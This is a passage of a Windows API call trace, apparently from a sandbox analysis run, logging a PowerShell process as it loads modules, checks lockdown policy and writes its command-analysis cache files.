	[0058.524] FindNextFileW (in: hFindFile=0x1505fc87950, lpFindFileData=0x184c18d0b0 | out: lpFindFileData=0x184c18d0b0) returned 0
	[0058.526] FindNextFileW (in: hFindFile=0x1505fc884f0, lpFindFileData=0x184c18d050 | out: lpFindFileData=0x184c18d050) returned 0
	[0058.614] FindFirstFileW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.Utility\\*", lpFindFileData=0x184c18d000 | out: lpFindFileData=0x184c18d000) returned 0x1505fc87950
	[0058.625] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbd9450
	[0058.625] GetSystemDirectoryW (in: lpBuffer=0x1505fbd9450, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0058.626] CoTaskMemFree (pv=0x1505fbd9450) 
	[0058.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18cd80, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.626] WldpGetLockdownPolicy () returned 0x0
	[0058.626] GetSystemInfo (in: lpSystemInfo=0x184c18d4a0 | out: lpSystemInfo=0x184c18d4a0*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0058.626] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18d3a8 | out: phkResult=0x184c18d3a8*=0x8ec) returned 0x0
	[0058.626] RegQueryValueExW (in: hKey=0x8ec, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184c18d3f8, lpData=0x0, lpcbData=0x184c18d3f0*=0x0 | out: lpType=0x184c18d3f8*=0x0, lpData=0x0, lpcbData=0x184c18d3f0*=0x0) returned 0x2
	[0058.626] RegCloseKey (hKey=0x8ec) returned 0x0
	[0058.626] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0x184c18cd90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77
	[0058.629] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbdd630
	[0058.629] GetSystemDirectoryW (in: lpBuffer=0x1505fbdd630, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13
	[0058.630] CoTaskMemFree (pv=0x1505fbdd630) 
	[0058.630] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x184c18cbe0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0058.630] WldpGetLockdownPolicy () returned 0x0
	[0058.630] GetSystemInfo (in: lpSystemInfo=0x184c18d300 | out: lpSystemInfo=0x184c18d300*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0x7ffffffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x4f01)) 
	[0058.630] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x184c18d208 | out: phkResult=0x184c18d208*=0x8f0) returned 0x0
	[0058.630] RegQueryValueExW (in: hKey=0x8f0, lpValueName="__PSLockdownPolicy", lpReserved=0x0, lpType=0x184c18d258, lpData=0x0, lpcbData=0x184c18d250*=0x0 | out: lpType=0x184c18d258*=0x0, lpData=0x0, lpcbData=0x184c18d250*=0x0) returned 0x2
	[0058.630] RegCloseKey (hKey=0x8f0) returned 0x0
	[0058.630] CloseHandle (hObject=0x8ec) returned 1
	[0058.631] CoCreateGuid (in: pguid=0x184c18d3b8 | out: pguid=0x184c18d3b8*(Data1=0x403584e4, Data2=0x10db, Data3=0x46f7, Data4=([0]=0xa5, [1]=0xc1, [2]=0xeb, [3]=0x83, [4]=0x93, [5]=0x23, [6]=0x29, [7]=0x36))) returned 0x0
	[0058.632] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0x184c18ce70, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77
	[0058.638] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0x184c18c9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77
	[0058.639] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", nBufferLength=0x105, lpBuffer=0x184c18cf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psd1", lpFilePart=0x0) returned 0x77
	[0058.640] CoTaskMemAlloc (cb=0x218) returned 0x1505fbdd630
	[0058.640] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbdd630, nSize=0x10a | out: lpBuffer="C:\\Windows\\system32") returned 0x0
	[0058.640] CoTaskMemFree (pv=0x1505fbdd630) 
	[0058.640] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbdaff0
	[0058.640] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbdaff0 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.640] CoTaskMemFree (pv=0x1505fbdaff0) 
	[0058.640] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18b460, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0058.640] GetCurrentProcess () returned 0xffffffffffffffff
	[0058.640] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18b918 | out: TokenHandle=0x184c18b918*=0x8ec) returned 1
	[0058.640] GetTokenInformation (in: TokenHandle=0x8ec, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184c18ba18 | out: TokenInformation=0x0, ReturnLength=0x184c18ba18) returned 0
	[0058.640] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1505fc9a7e0
	[0058.640] GetTokenInformation (in: TokenHandle=0x8ec, TokenInformationClass=0x1, TokenInformation=0x1505fc9a7e0, TokenInformationLength=0x2c, ReturnLength=0x184c18ba18 | out: TokenInformation=0x1505fc9a7e0, ReturnLength=0x184c18ba18) returned 1
	[0058.640] LocalFree (hMem=0x1505fc9a7e0) returned 0x0
	[0058.645] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x150476b60b0, cbSid=0x184c18ba10 | out: pSid=0x150476b60b0*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x184c18ba10) returned 1
	[0058.645] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18b8b0*=0x8f0, lpdwindex=0x184c18b684 | out: lpdwindex=0x184c18b684) returned 0x0
	[0058.645] CoTaskMemAlloc (cb=0x218) returned 0x1505fbda110
	[0058.645] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbda110, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.645] CoTaskMemFree (pv=0x1505fbda110) 
	[0058.645] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1", nBufferLength=0x105, lpBuffer=0x184c18b580, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtils.psm1", lpFilePart=0x0) returned 0x77
	[0058.706] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbd7f10
	[0058.706] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbd7f10 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.706] CoTaskMemFree (pv=0x1505fbd7f10) 
	[0058.706] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18aba0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0058.706] GetCurrentProcess () returned 0xffffffffffffffff
	[0058.706] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0x184c18b0e8 | out: TokenHandle=0x184c18b0e8*=0x8f4) returned 1
	[0058.706] GetTokenInformation (in: TokenHandle=0x8f4, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x184c18b1e8 | out: TokenInformation=0x0, ReturnLength=0x184c18b1e8) returned 0
	[0058.706] LocalAlloc (uFlags=0x0, uBytes=0x2c) returned 0x1505fc9af20
	[0058.706] GetTokenInformation (in: TokenHandle=0x8f4, TokenInformationClass=0x1, TokenInformation=0x1505fc9af20, TokenInformationLength=0x2c, ReturnLength=0x184c18b1e8 | out: TokenInformation=0x1505fc9af20, ReturnLength=0x184c18b1e8) returned 1
	[0058.706] LocalFree (hMem=0x1505fc9af20) returned 0x0
	[0058.707] CreateWellKnownSid (in: WellKnownSidType=0x1, DomainSid=0x0, pSid=0x150476e2748, cbSid=0x184c18b1e0 | out: pSid=0x150476e2748*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x1), SubAuthority=0x0), cbSid=0x184c18b1e0) returned 1
	[0058.707] CreateMutexW (lpMutexAttributes=0x150476e2898, bInitialOwner=0, lpName="Global\\PowerShell_CommandAnalysis_Lock_S-1-5-21-2172869166-1497266965-2109836178-1000") returned 0x8f8
	[0058.707] CoWaitForMultipleHandles (in: dwFlags=0x2, dwTimeout=0xffffffff, cHandles=0x1, pHandles=0x184c18b080*=0x8f8, lpdwindex=0x184c18ae54 | out: lpdwindex=0x184c18ae54) returned 0x0
	[0058.707] CoTaskMemAlloc (cb=0x218) returned 0x1505fbdc970
	[0058.707] GetEnvironmentVariableW (in: lpName="PSDisableModuleAutoLoadingMemoryCache", lpBuffer=0x1505fbdc970, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.707] CoTaskMemFree (pv=0x1505fbdc970) 
	[0058.707] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1", nBufferLength=0x105, lpBuffer=0x184c18ac90, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1", lpFilePart=0x0) returned 0x7c
	[0058.707] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b110) returned 1
	[0058.707] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\Microsoft.PowerShell.ODataUtils\\Microsoft.PowerShell.ODataUtilsHelper.ps1" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules\\microsoft.powershell.odatautils\\microsoft.powershell.odatautilshelper.ps1"), fInfoLevelId=0x0, lpFileInformation=0x150476e9698 | out: lpFileInformation=0x150476e9698*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5f9f05ad, ftCreationTime.dwHighDateTime=0x1d112e3, ftLastAccessTime.dwLowDateTime=0x5f9f05ad, ftLastAccessTime.dwHighDateTime=0x1d112e3, ftLastWriteTime.dwLowDateTime=0x5f9f05ad, ftLastWriteTime.dwHighDateTime=0x1d112e3, nFileSizeHigh=0x0, nFileSizeLow=0xcb3c)) returned 1
	[0058.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b0d0) returned 1
	[0058.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18af90) returned 1
	[0058.708] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18b070 | out: lpFileInformation=0x184c18b070*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1
	[0058.708] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18af50) returned 1
	[0058.708] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x184c18a9f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6a
	[0058.708] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18aed0) returned 1
	[0058.708] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x8fc
	[0058.709] GetFileType (hFile=0x8fc) returned 0x1
	[0058.709] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18ae40) returned 1
	[0058.709] GetFileType (hFile=0x8fc) returned 0x1
	[0058.709] ReadFile (in: hFile=0x8fc, lpBuffer=0x150476eacc8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x184c18ad38, lpOverlapped=0x0 | out: lpBuffer=0x150476eacc8*, lpNumberOfBytesRead=0x184c18ad38*=0x1000, lpOverlapped=0x0) returned 1
	[0058.709] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbdd850
	[0058.709] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbdd850 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.709] CoTaskMemFree (pv=0x1505fbdd850) 
	[0058.709] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18aa30, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0058.709] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18abd0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0058.709] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b010) returned 1
	[0058.710] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18b0f0 | out: lpFileInformation=0x184c18b0f0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1
	[0058.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18afd0) returned 1
	[0058.710] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_46610b03-43d8-466e-ac05-954274c00100", nBufferLength=0x105, lpBuffer=0x184c18aa70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_46610b03-43d8-466e-ac05-954274c00100", lpFilePart=0x0) returned 0x8f
	[0058.710] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18af50) returned 1
	[0058.710] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheEntry_46610b03-43d8-466e-ac05-954274c00100" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheentry_46610b03-43d8-466e-ac05-954274c00100"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x8fc
	[0058.710] GetFileType (hFile=0x8fc) returned 0x1
	[0058.710] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18aec0) returned 1
	[0058.710] GetFileType (hFile=0x8fc) returned 0x1
	[0058.710] SetEndOfFile (hFile=0x8fc) returned 1
	[0058.712] CoTaskMemAlloc (cb=0x20c) returned 0x1505fbd9450
	[0058.712] SHGetFolderPathW (in: hwnd=0x0, csidl=28, hToken=0x0, dwFlags=0x0, pszPath=0x1505fbd9450 | out: pszPath="C:\\Users\\Nd9E1FYi\\AppData\\Local") returned 0x0
	[0058.712] CoTaskMemFree (pv=0x1505fbd9450) 
	[0058.712] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local", nBufferLength=0x105, lpBuffer=0x184c18a9d0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local", lpFilePart=0x0) returned 0x1f
	[0058.712] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", nBufferLength=0x105, lpBuffer=0x184c18ab70, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\", lpFilePart=0x0) returned 0x4d
	[0058.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18afb0) returned 1
	[0058.712] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis"), fInfoLevelId=0x0, lpFileInformation=0x184c18b090 | out: lpFileInformation=0x184c18b090*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x95cbb7af, ftCreationTime.dwHighDateTime=0x1d31d93, ftLastAccessTime.dwLowDateTime=0xc171bbc1, ftLastAccessTime.dwHighDateTime=0x1d31d93, ftLastWriteTime.dwLowDateTime=0xc171bbc1, ftLastWriteTime.dwHighDateTime=0x1d31d93, nFileSizeHigh=0x0, nFileSizeLow=0xa000)) returned 1
	[0058.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18af70) returned 1
	[0058.712] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", nBufferLength=0x105, lpBuffer=0x184c18aa10, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex", lpFilePart=0x0) returned 0x6a
	[0058.712] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18aef0) returned 1
	[0058.712] CreateFileW (lpFileName="C:\\Users\\Nd9E1FYi\\AppData\\Local\\Microsoft\\Windows\\PowerShell\\CommandAnalysis\\PowerShell_AnalysisCacheIndex" (normalized: "c:\\users\\nd9e1fyi\\appdata\\local\\microsoft\\windows\\powershell\\commandanalysis\\powershell_analysiscacheindex"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x8fc
	[0058.712] GetFileType (hFile=0x8fc) returned 0x1
	[0058.712] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18ae60) returned 1
	[0058.712] GetFileType (hFile=0x8fc) returned 0x1
	[0058.712] SetEndOfFile (hFile=0x8fc) returned 1
	[0058.715] CoTaskMemAlloc (cb=0x218) returned 0x1505fbdd630
	[0058.715] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1505fbdd630, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x93
	[0058.715] CoTaskMemFree (pv=0x1505fbdd630) 
	[0058.715] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18b400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x35
	[0058.715] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b840) returned 1
	[0058.715] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18b920 | out: lpFileInformation=0x184c18b920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0058.715] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b800) returned 1
	[0058.718] GetFullPathNameW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18b400, lpFilePart=0x0 | out: lpBuffer="C:\\Program Files\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x2a
	[0058.718] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b840) returned 1
	[0058.718] GetFileAttributesExW (in: lpFileName="C:\\Program Files\\WindowsPowerShell\\Modules" (normalized: "c:\\program files\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18b920 | out: lpFileInformation=0x184c18b920*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0xc47584, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0xc6d7de, ftLastAccessTime.dwHighDateTime=0x1d112e4, ftLastWriteTime.dwLowDateTime=0xc6d7de, ftLastWriteTime.dwHighDateTime=0x1d112e4, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0058.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b800) returned 1
	[0058.718] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", nBufferLength=0x105, lpBuffer=0x184c18b400, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules", lpFilePart=0x0) returned 0x32
	[0058.718] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b840) returned 1
	[0058.718] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18b920 | out: lpFileInformation=0x184c18b920*(dwFileAttributes=0x14, ftCreationTime.dwLowDateTime=0x12fbf40, ftCreationTime.dwHighDateTime=0x1d112e4, ftLastAccessTime.dwLowDateTime=0x6f8bffde, ftLastAccessTime.dwHighDateTime=0x1d112f2, ftLastWriteTime.dwLowDateTime=0x6f8bffde, ftLastWriteTime.dwHighDateTime=0x1d112f2, nFileSizeHigh=0x0, nFileSizeLow=0x5000)) returned 1
	[0058.718] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b800) returned 1
	[0058.719] CoTaskMemAlloc (cb=0x218) returned 0x1505fbd7f10
	[0058.719] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x1505fbd7f10, nSize=0x10a | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules;C:\\Program Files\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules") returned 0x93
	[0058.719] CoTaskMemFree (pv=0x1505fbd7f10) 
	[0058.719] GetFullPathNameW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", nBufferLength=0x105, lpBuffer=0x184c18b400, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules", lpFilePart=0x0) returned 0x35
	[0058.719] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x184c18b840) returned 1
	[0058.719] GetFileAttributesExW (in: lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\modules"), fInfoLevelId=0x0, lpFileInformation=0x184c18b920 | out: lpFileInformation=0x184c18b920*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0
	[0058.719] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x184c18b800) returned 1
	[0058.720] GetFileAttributesW (lpFileName="C:\\Users\\Nd9E1FYi\\Documents\\WindowsPowerShell\\Modules" (normalized: "c:\\users\\nd9e1fyi\\documents\\windowspowershell\\modules")) returned 0xffffffff
